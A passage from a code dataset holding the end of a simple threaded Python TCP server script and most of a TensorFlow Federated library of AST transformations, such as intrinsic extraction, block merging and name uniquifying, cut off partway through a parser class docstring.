maximum backlog value that the \"socket.listen\" can allow by system\n tcp.listen(socket.SOMAXCONN)\n while True:\n # if input(\"Write 'exit' or 'quit' for close server...\\n\") == 'exit' or 'quit':\n # print('\\033[1;30;41m Good bye! \\033[m')\n # break\n\n # return a new socket representing the connection, and the address of the client\n (conn, addr) = tcp.accept()\n\n threading.Thread(target=threaded.Thread, args=(conn,)).start()\ntcp.close()\n","sub_path":"server_side.py","file_name":"server_side.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289665632","text":"# Lint as: python3\n# Copyright 2018, The TensorFlow Federated Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A library of transformations that can be applied to a computation.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport itertools\n\nimport six\nfrom six.moves import range\n\nfrom tensorflow_federated.python.common_libs import anonymous_tuple\nfrom tensorflow_federated.python.common_libs import py_typecheck\nfrom tensorflow_federated.python.core.api import computation_types\nfrom tensorflow_federated.python.core.impl import compiled_computation_transforms\nfrom tensorflow_federated.python.core.impl import computation_building_blocks\nfrom tensorflow_federated.python.core.impl import computation_constructing_utils\nfrom tensorflow_federated.python.core.impl import context_stack_base\nfrom tensorflow_federated.python.core.impl import federated_computation_utils\nfrom tensorflow_federated.python.core.impl import intrinsic_defs\nfrom tensorflow_federated.python.core.impl import transformation_utils\n\n\ndef extract_intrinsics(comp):\n r\"\"\"Extracts intrinsics to the scope which binds any variable it depends on.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n replaces the following computation containing a called intrinsic:\n\n ...\n \\\n Call\n / \\\n Intrinsic ...\n\n with the following computation containing a block with the extracted called\n intrinsic:\n\n Block\n / \\\n [x=Call] ...\n / \\ \\\n Intrinsic ... Ref(x)\n\n The called intrinsics are extracted to the scope which binds any variable the\n called intrinsic depends. If the called intrinsic is not bound by any\n computation in `comp` it will be extracted to the root. Both the\n `parameter_name` of a `computation_building_blocks.Lambda` and the name of any\n variable defined by a `computation_building_blocks.Block` can affect the scope\n in which a reference in called intrinsic is bound.\n\n NOTE: This function will also extract blocks to the scope in which they are\n bound because block variables can restrict the scope in which intrinsics are\n bound.\n\n Args:\n comp: The computation building block in which to perform the extractions.\n The names of lambda parameters and block variables in `comp` must be\n unique.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n ValueError: If `comp` contains variables with non-unique names.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n _check_has_unique_names(comp)\n name_generator = computation_constructing_utils.unique_name_generator(comp)\n unbound_references = _get_unbound_references(comp)\n\n def _contains_unbound_reference(comp, names):\n \"\"\"Returns `True` if `comp` contains unbound references to `names`.\n\n This function will update the non-local `unbound_references` captured from\n the parent context if `comp` is not contained in that collection. This can\n happen when new computations are created and added to the AST.\n\n Args:\n comp: The computation building block to test.\n names: A Python string or a list, tuple, or set of Python strings.\n \"\"\"\n if isinstance(names, six.string_types):\n names = (names,)\n if comp not in unbound_references:\n references = _get_unbound_references(comp)\n unbound_references.update(references)\n return any(n in unbound_references[comp] for n in names)\n\n def _is_called_intrinsic_or_block(comp):\n \"\"\"Returns `True` if `comp` is a called intrinsic or a block.\"\"\"\n return (_is_called_intrinsic(comp) or\n isinstance(comp, computation_building_blocks.Block))\n\n def _should_transform(comp):\n \"\"\"Returns `True` if `comp` should be transformed.\n\n The following `_extract_intrinsic_*` methods all depend on being invoked\n after `_should_transform` evaluates to `True` for a given `comp`. Because of\n this certain assumptions are made:\n\n * transformation functions will transform a given `comp`\n * block variables are guaranteed to not be empty\n\n Args:\n comp: The computation building block in which to test.\n \"\"\"\n if isinstance(comp, computation_building_blocks.Block):\n return (_is_called_intrinsic_or_block(comp.result) or any(\n isinstance(e, computation_building_blocks.Block)\n for _, e in comp.locals))\n elif isinstance(comp, computation_building_blocks.Call):\n return _is_called_intrinsic_or_block(comp.argument)\n elif isinstance(comp, computation_building_blocks.Lambda):\n if _is_called_intrinsic(comp.result):\n return True\n if isinstance(comp.result, computation_building_blocks.Block):\n for index, (_, variable) in enumerate(comp.result.locals):\n names = [n for n, _ in comp.result.locals[:index]]\n if (not _contains_unbound_reference(variable, comp.parameter_name) and\n not _contains_unbound_reference(variable, names)):\n return True\n elif isinstance(comp, computation_building_blocks.Selection):\n return _is_called_intrinsic_or_block(comp.source)\n elif isinstance(comp, computation_building_blocks.Tuple):\n return any(_is_called_intrinsic_or_block(e) for e in comp)\n return False\n\n def _extract_from_block(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.result):\n called_intrinsic = comp.result\n name = six.next(name_generator)\n variables = comp.locals\n variables.append((name, called_intrinsic))\n result = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n return computation_building_blocks.Block(variables, result)\n elif isinstance(comp.result, computation_building_blocks.Block):\n return computation_building_blocks.Block(comp.locals + comp.result.locals,\n comp.result.result)\n else:\n variables = []\n for name, variable in comp.locals:\n if isinstance(variable, computation_building_blocks.Block):\n variables.extend(variable.locals)\n variables.append((name, variable.result))\n else:\n variables.append((name, variable))\n return computation_building_blocks.Block(variables, comp.result)\n\n def _extract_from_call(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.argument):\n called_intrinsic = comp.argument\n name = six.next(name_generator)\n variables = ((name, called_intrinsic),)\n result = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n else:\n block = comp.argument\n variables = block.locals\n result = block.result\n call = computation_building_blocks.Call(comp.function, result)\n block = computation_building_blocks.Block(variables, call)\n return _extract_from_block(block)\n\n def _extract_from_lambda(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.result):\n called_intrinsic = comp.result\n name = six.next(name_generator)\n variables = ((name, called_intrinsic),)\n ref = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n if not _contains_unbound_reference(comp.result, comp.parameter_name):\n fn = computation_building_blocks.Lambda(comp.parameter_name,\n comp.parameter_type, ref)\n return computation_building_blocks.Block(variables, fn)\n else:\n block = computation_building_blocks.Block(variables, ref)\n return computation_building_blocks.Lambda(comp.parameter_name,\n comp.parameter_type, block)\n else:\n block = comp.result\n extracted_variables = []\n retained_variables = []\n for name, variable in block.locals:\n names = [n for n, _ in retained_variables]\n if (not _contains_unbound_reference(variable, comp.parameter_name) and\n not _contains_unbound_reference(variable, names)):\n extracted_variables.append((name, variable))\n else:\n retained_variables.append((name, variable))\n if retained_variables:\n result = computation_building_blocks.Block(retained_variables,\n block.result)\n else:\n result = block.result\n fn = computation_building_blocks.Lambda(comp.parameter_name,\n comp.parameter_type, result)\n block = computation_building_blocks.Block(extracted_variables, fn)\n return _extract_from_block(block)\n\n def _extract_from_selection(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n if _is_called_intrinsic(comp.source):\n called_intrinsic = comp.source\n name = six.next(name_generator)\n variables = ((name, called_intrinsic),)\n result = computation_building_blocks.Reference(\n name, called_intrinsic.type_signature)\n else:\n block = comp.source\n variables = block.locals\n result = block.result\n selection = computation_building_blocks.Selection(\n result, name=comp.name, index=comp.index)\n block = computation_building_blocks.Block(variables, selection)\n return _extract_from_block(block)\n\n def _extract_from_tuple(comp):\n \"\"\"Returns a new computation with all intrinsics extracted.\"\"\"\n variables = []\n elements = []\n for name, element in anonymous_tuple.to_elements(comp):\n if _is_called_intrinsic_or_block(element):\n variable_name = six.next(name_generator)\n variables.append((variable_name, element))\n ref = computation_building_blocks.Reference(variable_name,\n element.type_signature)\n elements.append((name, ref))\n else:\n elements.append((name, element))\n tup = computation_building_blocks.Tuple(elements)\n block = computation_building_blocks.Block(variables, tup)\n return _extract_from_block(block)\n\n def _transform(comp):\n \"\"\"Returns a new transformed computation or `comp`.\"\"\"\n if not _should_transform(comp):\n return comp, False\n if isinstance(comp, computation_building_blocks.Block):\n comp = _extract_from_block(comp)\n elif isinstance(comp, computation_building_blocks.Call):\n comp = _extract_from_call(comp)\n elif isinstance(comp, computation_building_blocks.Lambda):\n comp = _extract_from_lambda(comp)\n elif isinstance(comp, computation_building_blocks.Selection):\n comp = _extract_from_selection(comp)\n elif isinstance(comp, computation_building_blocks.Tuple):\n comp = _extract_from_tuple(comp)\n return comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef inline_block_locals(comp, variable_names=None):\n \"\"\"Inlines the block variables in `comp` whitelisted by `variable_names`.\n\n Args:\n comp: The computation building block in which to perform the extractions.\n The names of lambda parameters and block variables in `comp` must be\n unique.\n variable_names: A Python list, tuple, or set representing the whitelist of\n variable names to inline; or None if all variables should be inlined.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n ValueError: If `comp` contains variables with non-unique names.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n _check_has_unique_names(comp)\n if variable_names is not None:\n py_typecheck.check_type(variable_names, (list, tuple, set))\n\n def _should_inline_variable(name):\n return variable_names is None or name in variable_names\n\n def _should_transform(comp):\n return ((isinstance(comp, computation_building_blocks.Reference) and\n _should_inline_variable(comp.name)) or\n (isinstance(comp, computation_building_blocks.Block) and\n any(_should_inline_variable(name) for name, _ in comp.locals)))\n\n def _transform(comp, symbol_tree):\n \"\"\"Returns a new transformed computation or `comp`.\"\"\"\n if not _should_transform(comp):\n return comp, False\n if isinstance(comp, computation_building_blocks.Reference):\n value = symbol_tree.get_payload_with_name(comp.name).value\n # This identifies a variable bound by a Block as opposed to a Lambda.\n if value is not None:\n return value, True\n else:\n return comp, False\n elif isinstance(comp, computation_building_blocks.Block):\n variables = [(name, value)\n for name, value in comp.locals\n if not _should_inline_variable(name)]\n if not variables:\n comp = comp.result\n else:\n comp = computation_building_blocks.Block(variables, comp.result)\n return comp, True\n return comp, False\n\n symbol_tree = transformation_utils.SymbolTree(\n transformation_utils.ReferenceCounter)\n return transformation_utils.transform_postorder_with_symbol_bindings(\n comp, _transform, symbol_tree)\n\n\ndef merge_chained_blocks(comp):\n r\"\"\"Merges all the chained blocks in `comp` into one block.\n\n Looks for occurrences of the following pattern:\n\n Block\n / \\\n [...] Block\n / \\\n [...] Comp(x)\n\n And merges them to\n\n Block\n / \\\n [...] Comp(x)\n\n Preserving the relative ordering of any locals declarations in a postorder\n walk, which therefore preserves scoping rules.\n\n Notice that because TFF Block constructs bind their variables in sequence, it\n is completely safe to add the locals lists together in this implementation,\n\n Args:\n comp: The computation building block in which to perform the merges.\n\n Returns:\n Transformed version of `comp` with its neighboring blocks merged.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Block) and\n isinstance(comp.result, computation_building_blocks.Block))\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = computation_building_blocks.Block(\n comp.locals + comp.result.locals, comp.result.result)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef merge_chained_federated_maps_or_applys(comp):\n r\"\"\"Merges all the chained federated maps or federated apply in `comp`.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n replaces the following computation containing two federated map intrinsics:\n\n Call\n / \\\n Intrinsic Tuple\n |\n [Comp(x), Call]\n / \\\n Intrinsic Tuple\n |\n [Comp(y), Comp(z)]\n\n intrinsic()>)\n\n with the following computation containing one federated map or apply\n intrinsic:\n\n\n Call\n / \\\n Intrinsic Tuple\n |\n [Block, Comp(z)]\n / \\\n [fn=Tuple] Lambda(arg)\n | \\\n [Comp(y), Comp(x)] Call\n / \\\n Sel(1) Call\n / / \\\n Ref(fn) Sel(0) Ref(arg)\n /\n Ref(fn)\n\n intrinsic(<(let fn= in (arg -> fn[1](fn[0](arg)))), z>)\n\n The functional computations `x` and `y`, and the argument `z` are retained;\n the other computations are replaced.\n\n Args:\n comp: The computation building block in which to perform the merges.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n name_generator = computation_constructing_utils.unique_name_generator(comp)\n\n def _should_transform(comp):\n \"\"\"Returns `True` if `comp` is a chained federated map.\"\"\"\n if _is_called_intrinsic(comp, (\n intrinsic_defs.FEDERATED_APPLY.uri,\n intrinsic_defs.FEDERATED_MAP.uri,\n )):\n outer_arg = comp.argument[1]\n if _is_called_intrinsic(outer_arg, comp.function.uri):\n return True\n return False\n\n def _transform(comp):\n \"\"\"Returns a new transformed computation or `comp`.\"\"\"\n if not _should_transform(comp):\n return comp, False\n\n def _create_block_to_chained_calls(comps):\n r\"\"\"Constructs a transformed block computation from `comps`.\n\n Block\n / \\\n [fn=Tuple] Lambda(arg)\n | \\\n [Comp(y), Comp(x)] Call\n / \\\n Sel(1) Call\n / / \\\n Ref(fn) Sel(0) Ref(arg)\n /\n Ref(fn)\n\n (let fn= in (arg -> fn[1](fn[0](arg)))\n\n Args:\n comps: A Python list of computations.\n\n Returns:\n A `computation_building_blocks.Block`.\n \"\"\"\n functions = computation_building_blocks.Tuple(comps)\n functions_name = six.next(name_generator)\n functions_ref = computation_building_blocks.Reference(\n functions_name, functions.type_signature)\n arg_name = six.next(name_generator)\n arg_type = comps[0].type_signature.parameter\n arg_ref = computation_building_blocks.Reference(arg_name, arg_type)\n arg = arg_ref\n for index, _ in enumerate(comps):\n fn_sel = computation_building_blocks.Selection(\n functions_ref, index=index)\n call = computation_building_blocks.Call(fn_sel, arg)\n arg = call\n fn = computation_building_blocks.Lambda(arg_ref.name,\n arg_ref.type_signature, call)\n return computation_building_blocks.Block(\n ((functions_ref.name, functions),), fn)\n\n block = _create_block_to_chained_calls((\n comp.argument[1].argument[0],\n comp.argument[0],\n ))\n arg = computation_building_blocks.Tuple([\n block,\n comp.argument[1].argument[1],\n ])\n intrinsic_type = computation_types.FunctionType(\n arg.type_signature, comp.function.type_signature.result)\n intrinsic = computation_building_blocks.Intrinsic(comp.function.uri,\n intrinsic_type)\n transformed_comp = computation_building_blocks.Call(intrinsic, arg)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef merge_tuple_intrinsics(comp, uri):\n r\"\"\"Merges all the tuples of intrinsics in `comp` into one intrinsic.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n replaces the following computation containing a tuple of called intrinsics all\n represeting the same operation:\n\n Tuple\n |\n [Call, Call, ...]\n / \\ / \\\n Intrinsic Tuple Intrinsic Tuple\n | |\n [Comp(f1), Comp(v1), ...] [Comp(f2), Comp(v2), ...]\n\n ), Intrinsic()>\n\n with the following computation containing one called intrinsic:\n\n federated_unzip(Call)\n / \\\n Intrinsic Tuple\n |\n [Block, federated_zip(Tuple), ...]\n / \\ |\n fn=Tuple Lambda(arg) [Comp(v1), Comp(v2), ...]\n | \\\n [Comp(f1), Comp(f2), ...] Tuple\n |\n [Call, Call, ...]\n / \\ / \\\n Sel(0) Sel(0) Sel(1) Sel(1)\n / / / /\n Ref(fn) Ref(arg) Ref(fn) Ref(arg)\n\n Intrinsic(<\n (let fn= in (arg -> )),\n ,\n >)\n\n The functional computations `f1`, `f2`, etc..., and the computations `v1`,\n `v2`, etc... are retained; the other computations are replaced.\n\n NOTE: This is just an example of what this transformation would look like when\n applied to a tuple of federated maps. The components `f1`, `f2`, `v1`, and\n `v2` and the number of those components are not important.\n\n This transformation is implemented to match the following intrinsics:\n\n * intrinsic_defs.FEDERATED_AGGREGATE.uri\n * intrinsic_defs.FEDERATED_BROADCAST.uri\n * intrinsic_defs.FEDERATED_MAP.uri\n\n Args:\n comp: The computation building block in which to perform the merges.\n uri: The URI of the intrinsic to merge.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n py_typecheck.check_type(uri, six.string_types)\n expected_uri = (\n intrinsic_defs.FEDERATED_AGGREGATE.uri,\n intrinsic_defs.FEDERATED_BROADCAST.uri,\n intrinsic_defs.FEDERATED_MAP.uri,\n )\n if uri not in expected_uri:\n raise ValueError(\n 'The value of `uri` is expected to be on of {}, found {}'.format(\n expected_uri, uri))\n name_generator = computation_constructing_utils.unique_name_generator(comp)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Tuple) and\n _is_called_intrinsic(comp[0], uri) and all(\n _is_called_intrinsic(element, comp[0].function.uri)\n for element in comp))\n\n def _transform_functional_args(comps):\n r\"\"\"Transforms the functional computations `comps`.\n\n Given a computation containing `n` called intrinsics with `m` arguments,\n this function constructs the following computation from the functional\n arguments of the called intrinsic:\n\n Block\n / \\\n [fn=Tuple] Lambda(arg)\n | \\\n [Comp(f1), Comp(f2), ...] Tuple\n |\n [Call, Call, ...]\n / \\ / \\\n Sel(0) Sel(0) Sel(1) Sel(1)\n / / / /\n Ref(fn) Ref(arg) Ref(fn) Ref(arg)\n\n with one `computation_building_blocks.Call` for each `n`. This computation\n represents one of `m` arguments that should be passed to the call of the\n transformed computation.\n\n Args:\n comps: a Python list of computations.\n\n Returns:\n A `computation_building_blocks.Block`.\n \"\"\"\n functions = computation_building_blocks.Tuple(comps)\n functions_name = six.next(name_generator)\n functions_ref = computation_building_blocks.Reference(\n functions_name, functions.type_signature)\n arg_name = six.next(name_generator)\n arg_type = [element.type_signature.parameter for element in comps]\n arg_ref = computation_building_blocks.Reference(arg_name, arg_type)\n elements = []\n for index in range(len(comps)):\n sel_fn = computation_building_blocks.Selection(functions_ref, index=index)\n sel_arg = computation_building_blocks.Selection(arg_ref, index=index)\n call = computation_building_blocks.Call(sel_fn, sel_arg)\n elements.append(call)\n calls = computation_building_blocks.Tuple(elements)\n fn = computation_building_blocks.Lambda(arg_ref.name,\n arg_ref.type_signature, calls)\n return computation_building_blocks.Block(((functions_ref.name, functions),),\n fn)\n\n def _transform_non_functional_args(comps):\n r\"\"\"Transforms the non-functional computations `comps`.\n\n Given a computation containing `n` called intrinsics with `m` arguments,\n this function constructs the following computation from the non-functional\n arguments of the called intrinsic:\n\n federated_zip(Tuple)\n |\n [Comp, Comp, ...]\n\n or\n\n Tuple\n |\n [Comp, Comp, ...]\n\n with one `computation_building_blocks.ComputationBuildignBlock` for each\n `n`. This computation represents one of `m` arguments that should be passed\n to the call of the transformed computation.\n\n Args:\n comps: A Python list of computations.\n\n Returns:\n A `computation_building_blocks.Block`.\n \"\"\"\n values = computation_building_blocks.Tuple(comps)\n first_comp = comps[0]\n if isinstance(first_comp.type_signature, computation_types.FederatedType):\n return computation_constructing_utils.create_federated_zip(values)\n else:\n return values\n\n def _transform_args(comp):\n \"\"\"Transforms the arguments from `comp`.\n\n Given a computation containing a tuple of intrinsics that can be merged,\n this function constructs the follwing computation from the arguments of the\n called intrinsic:\n\n Tuple\n |\n [Block, federated_zip(Tuple), ...]\n\n with one `computation_building_blocks.Block` for each functional computation\n in `m` and one called federated zip (or Tuple) for each non-functional\n computation in `m`. This list of computations represent the `m` arguments\n that should be passed to the call of the transformed computation.\n\n Args:\n comp: The computation building block in which to perform the merges.\n\n Returns:\n A `computation_building_blocks.ComputationBuildingBlock` representing the\n transformed arguments from `comp`.\n \"\"\"\n first_comp = comp[0]\n if isinstance(first_comp.argument, computation_building_blocks.Tuple):\n comps = [[] for _ in range(len(first_comp.argument))]\n for _, call in anonymous_tuple.to_elements(comp):\n for index, arg in enumerate(call.argument):\n comps[index].append(arg)\n else:\n comps = [[]]\n for _, call in anonymous_tuple.to_elements(comp):\n comps[0].append(call.argument)\n elements = []\n for args in comps:\n first_args = args[0]\n if isinstance(first_args.type_signature, computation_types.FunctionType):\n transformed_args = _transform_functional_args(args)\n else:\n transformed_args = _transform_non_functional_args(args)\n elements.append(transformed_args)\n if isinstance(first_comp.argument, computation_building_blocks.Tuple):\n return computation_building_blocks.Tuple(elements)\n else:\n return elements[0]\n\n def _transform(comp):\n \"\"\"Returns a new transformed computation or `comp`.\"\"\"\n if not _should_transform(comp):\n return comp, False\n arg = _transform_args(comp)\n first_comp = comp[0]\n named_comps = anonymous_tuple.to_elements(comp)\n parameter_type = computation_types.to_type(arg.type_signature)\n type_signature = [call.type_signature.member for _, call in named_comps]\n result_type = computation_types.FederatedType(\n type_signature, first_comp.type_signature.placement,\n first_comp.type_signature.all_equal)\n intrinsic_type = computation_types.FunctionType(parameter_type, result_type)\n intrinsic = computation_building_blocks.Intrinsic(first_comp.function.uri,\n intrinsic_type)\n call = computation_building_blocks.Call(intrinsic, arg)\n tup = computation_constructing_utils.create_federated_unzip(call)\n names = [name for name, _ in named_comps]\n transformed_comp = computation_constructing_utils.create_named_tuple(\n tup, names)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef remove_mapped_or_applied_identity(comp):\n r\"\"\"Removes all the mapped or applied identity functions in `comp`.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n removes all the mapped or applied identity fucntions by replacing the\n following computation:\n\n Call\n / \\\n Intrinsic Tuple\n |\n [Lambda(x), Comp(y)]\n \\\n Ref(x)\n\n Intrinsic(<(x -> x), y>)\n\n with its argument:\n\n Comp(y)\n\n y\n\n Args:\n comp: The computation building block in which to perform the removals.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n \"\"\"Returns `True` if `comp` is a mapped or applied identity function.\"\"\"\n if (isinstance(comp, computation_building_blocks.Call) and\n isinstance(comp.function, computation_building_blocks.Intrinsic) and\n comp.function.uri in (\n intrinsic_defs.FEDERATED_MAP.uri,\n intrinsic_defs.FEDERATED_APPLY.uri,\n intrinsic_defs.SEQUENCE_MAP.uri,\n )):\n called_function = comp.argument[0]\n if _is_identity_function(called_function):\n return True\n return False\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = comp.argument[1]\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef replace_called_lambda_with_block(comp):\n r\"\"\"Replaces all the called lambdas in `comp` with a block.\n\n This transform traverses `comp` postorder, matches the following pattern, and\n replaces the following computation containing a called lambda:\n\n Call\n / \\\n Lambda(x) Comp(y)\n \\\n Comp(z)\n\n (x -> z)(y)\n\n with the following computation containing a block:\n\n Block\n / \\\n [x=Comp(y)] Comp(z)\n\n let x=y in z\n\n The functional computation `b` and the argument `c` are retained; the other\n computations are replaced. This transformation is used to facilitate the\n merging of TFF orchestration logic, in particular to remove unnecessary lambda\n expressions and as a stepping stone for merging Blocks together.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Call) and\n isinstance(comp.function, computation_building_blocks.Lambda))\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = computation_building_blocks.Block(\n [(comp.function.parameter_name, comp.argument)], comp.function.result)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef replace_intrinsic_with_callable(comp, uri, body, context_stack):\n \"\"\"Replaces all the intrinsics with the given `uri` with a callable.\n\n This transform traverses `comp` postorder and replaces all the intrinsics with\n the given `uri` with a polymorphic callable that represents the body of the\n implementation of the intrinsic; i.e., one that given the parameter of the\n intrinsic constructs the intended result. This will typically be a Python\n function decorated with `@federated_computation` to make it into a polymorphic\n callable.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n uri: The URI of the intrinsic to replace.\n body: A polymorphic callable.\n context_stack: The context stack to use.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n py_typecheck.check_type(uri, six.string_types)\n py_typecheck.check_type(context_stack, context_stack_base.ContextStack)\n if not callable(body):\n raise TypeError('The body of the intrinsic must be a callable.')\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Intrinsic) and\n comp.uri == uri and\n isinstance(comp.type_signature, computation_types.FunctionType))\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n # We need 'wrapped_body' to accept exactly one argument.\n wrapped_body = lambda x: body(x) # pylint: disable=unnecessary-lambda\n transformed_comp = federated_computation_utils.zero_or_one_arg_fn_to_building_block(\n wrapped_body, 'arg', comp.type_signature.parameter, context_stack, uri)\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef replace_selection_from_tuple_with_element(comp):\n r\"\"\"Replaces any selection from a tuple with the underlying tuple element.\n\n Replaces any occurences of:\n\n Selection\n \\\n Tuple\n |\n [Comp, Comp, ...]\n\n with the appropriate Comp, as determined by the `index` or `name` of the\n `Selection`.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n A possibly modified version of comp, without any occurrences of selections\n from tuples.\n\n Raises:\n TypeError: If `comp` is not an instance of\n `computation_building_blocks.ComputationBuildingBlock`.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n\n def _should_transform(comp):\n return (isinstance(comp, computation_building_blocks.Selection) and\n isinstance(comp.source, computation_building_blocks.Tuple))\n\n def _get_index_from_name(selection_name, tuple_type_signature):\n named_type_signatures = anonymous_tuple.to_elements(tuple_type_signature)\n return [x[0] for x in named_type_signatures].index(selection_name)\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n if comp.name is not None:\n index = _get_index_from_name(comp.name, comp.source.type_signature)\n else:\n index = comp.index\n return comp.source[index], True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef uniquify_compiled_computation_names(comp):\n \"\"\"Replaces all the compiled computations names in `comp` with unique names.\n\n This transform traverses `comp` postorder and replaces the name of all the\n comiled computations found in `comp` with a unique name.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n A new computation with the transformation applied or the original `comp`.\n\n Raises:\n TypeError: If types do not match.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n name_generator = computation_constructing_utils.unique_name_generator(\n None, prefix='')\n\n def _should_transform(comp):\n return isinstance(comp, computation_building_blocks.CompiledComputation)\n\n def _transform(comp):\n if not _should_transform(comp):\n return comp, False\n transformed_comp = computation_building_blocks.CompiledComputation(\n comp.proto, six.next(name_generator))\n return transformed_comp, True\n\n return transformation_utils.transform_postorder(comp, _transform)\n\n\ndef uniquify_reference_names(comp):\n \"\"\"Replaces all the reference names in `comp` with unique names.\n\n Args:\n comp: The computation building block in which to perform the replacements.\n\n Returns:\n Returns a transformed version of comp inside of which all variable names\n are guaranteed to be unique.\n \"\"\"\n py_typecheck.check_type(comp,\n computation_building_blocks.ComputationBuildingBlock)\n name_generator = computation_constructing_utils.unique_name_generator(None)\n\n class _RenameNode(transformation_utils.BoundVariableTracker):\n \"\"\"transformation_utils.SymbolTree node for renaming References in ASTs.\"\"\"\n\n def __init__(self, name, value):\n super(_RenameNode, self).__init__(name, value)\n py_typecheck.check_type(name, str)\n self.new_name = six.next(name_generator)\n\n def __str__(self):\n return 'Value: {}, name: {}, new_name: {}'.format(self.value, self.name,\n self.new_name)\n\n def _transform(comp, context_tree):\n \"\"\"Renames References in `comp` to unique names.\"\"\"\n if isinstance(comp, computation_building_blocks.Reference):\n new_name = context_tree.get_payload_with_name(comp.name).new_name\n return computation_building_blocks.Reference(new_name,\n comp.type_signature,\n comp.context), True\n elif isinstance(comp, computation_building_blocks.Block):\n new_locals = []\n for name, val in comp.locals:\n context_tree.walk_down_one_variable_binding()\n new_name = context_tree.get_payload_with_name(name).new_name\n new_locals.append((new_name, val))\n return computation_building_blocks.Block(new_locals, comp.result), True\n elif isinstance(comp, computation_building_blocks.Lambda):\n context_tree.walk_down_one_variable_binding()\n new_name = context_tree.get_payload_with_name(\n comp.parameter_name).new_name\n return computation_building_blocks.Lambda(new_name, comp.parameter_type,\n comp.result), True\n return comp, False\n\n symbol_tree = transformation_utils.SymbolTree(_RenameNode)\n return transformation_utils.transform_postorder_with_symbol_bindings(\n comp, _transform, symbol_tree)\n\n\nclass TFParser(object):\n \"\"\"Callable taking subset of TFF AST constructs to CompiledComputations.\n\n When this function is applied via `transformation_utils.transform_postorder`\n to a TFF AST node satisfying its assumptions, the tree under this node will\n be reduced to a single instance of\n `computation_building_blocks.CompiledComputation` representing the same\n logic.\n\n Notice that this function is designed to be applied to what is essentially\n a subtree of a larger TFF AST; once the processing on a single device has\n been aligned at the AST level, and placement separated from the logic of\n this processing, we should be left with a function wrapped via\n `federated_map` or `federated_apply` to a federated argument. It is this\n function which we need to reduce to TensorFlow, and it is to the root\n node of this function which we are looking to apply `TFParser`. Because of\n this, we assume that there is a lambda expression at the top of the AST\n we are looking to parse, as well as the rest of the assumptions below.\n\n We have no proof that these assumptions are sufficient for this\n library to parse *all* 